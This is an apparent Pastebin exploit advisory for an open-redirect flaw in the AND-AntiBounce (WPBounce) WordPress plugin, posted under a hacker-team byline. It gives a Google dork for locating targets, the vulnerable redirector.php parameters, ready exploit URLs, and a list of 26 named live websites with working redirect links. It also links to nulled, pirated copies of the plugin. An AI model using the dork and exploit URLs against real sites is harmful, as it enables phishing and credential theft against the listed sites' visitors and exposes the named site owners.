Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################################################
- # Exploit Title : WordPress 5.1.1 WPBounce AND-AntiBounce Plugins 1.0.3 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 27/03/2019
- # Vendor Homepage : devrix.com - wpbounce.com
- # Software Information Links :
- devrix.com/shop/product/wpbounce-anti-bounce-wordpress-plugin-2/
- codecanyon.net/item/wpbounce-anti-bounce-wordpress-plugin/12369000
- nulled.pro/wpbounce-anti-bounce-wordpress-plugin/
- wplocker.com/plugins/codecanyon/5907-wpbounce-anti-bounce-wordpress-plugin.html
- gfxdownload.com/wpbounce-anti-bounce-wordpress-plugin-free-download/
- affiliseo.de/anti-bounce/
- # Software Affected Version : Plugin Version 1.0.3 and higher
- WordPress Versions 4.x - 4.0.26 - 4.1.x - 4.1.26 - 4.3.19 - 4.2.23 -
- 4.3.19 - 4.7/4.8 - 4.8.2 - 4.9.x - 4.9.8 - 4.9.9 - 5.0.x - 5.0.4 - 5.1.1
- # Software Price : 20$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:"/wp-content/plugins/AND-AntiBounce/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/ascii/WLB-2019030226
- ################################################################################
- # Information About Software :
- ***************************
- WPBounce is a WordPress plugin that helps you minimizing the bounce rate of your landing pages, online shops
- and other websites by displaying an offer when a potential customer is about to leave your website.
- ################################################################################
- # Impact :
- ***********
- WordPress 4.x.x/5.x.x AND-AntiBounce Plugins 1.0.3 and other versions accepts a user-controlled input
- that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
- An http parameter may contain a URL value and could cause the web application to redirect the
- request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully
- launch a phishing scam and steal user credentials. Because the server name in the modified link is identical
- to the original site, phishing attempts have a more trustworthy appearance. Open redirect is a failure in that
- process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in
- phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection
- when they visit the Web site of a company whose name has been changed or which has been acquired
- by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is
- to deceive the valid actor and steal his personal data.
- ################################################################################
- # Vulnerable File :
- ****************
- /redirector.php
- # Vulnerable Parameter :
- **********************
- ?url=
- &redirect=
- ?url=[......]&redirect=
- # Open Redirection Exploit :
- **************************
- /wp-content/plugins/AND-AntiBounce/redirector.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wp-content/plugins/AND-AntiBounce/redirector.php?url=https://www.[REDIRECTION-ADDRESS].gov&redirect=https://www.[REDIRECTION-ADDRESS].gov
- ################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] instrumentosdelaboratorio.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] mikrowelletest24.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] sucheerotikabenteuer.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] kohle-zahnpasta.eu/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] zapatillas-running.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] iniciosesionentrar.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] fitnessygimnasio.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] ab18-erotik.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] sexkontakte-privat.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] ficken-macht-spass.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] sexpartner-finden.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] fickfrauen.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] motsimabuse-dietanzschule.de/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] privatsextreffen.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] reife-hausfrauen.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] sextreffheute.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] dominasuche.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] frauenkontakte.biz/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] comobajarpesohoy.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] privatefickdates.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] erosucher.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] canal-moto.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] buscarparejainternet.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] kontakte-sex.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] golesmagicos.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- [+] sofort-fremdgehen.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
- ################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement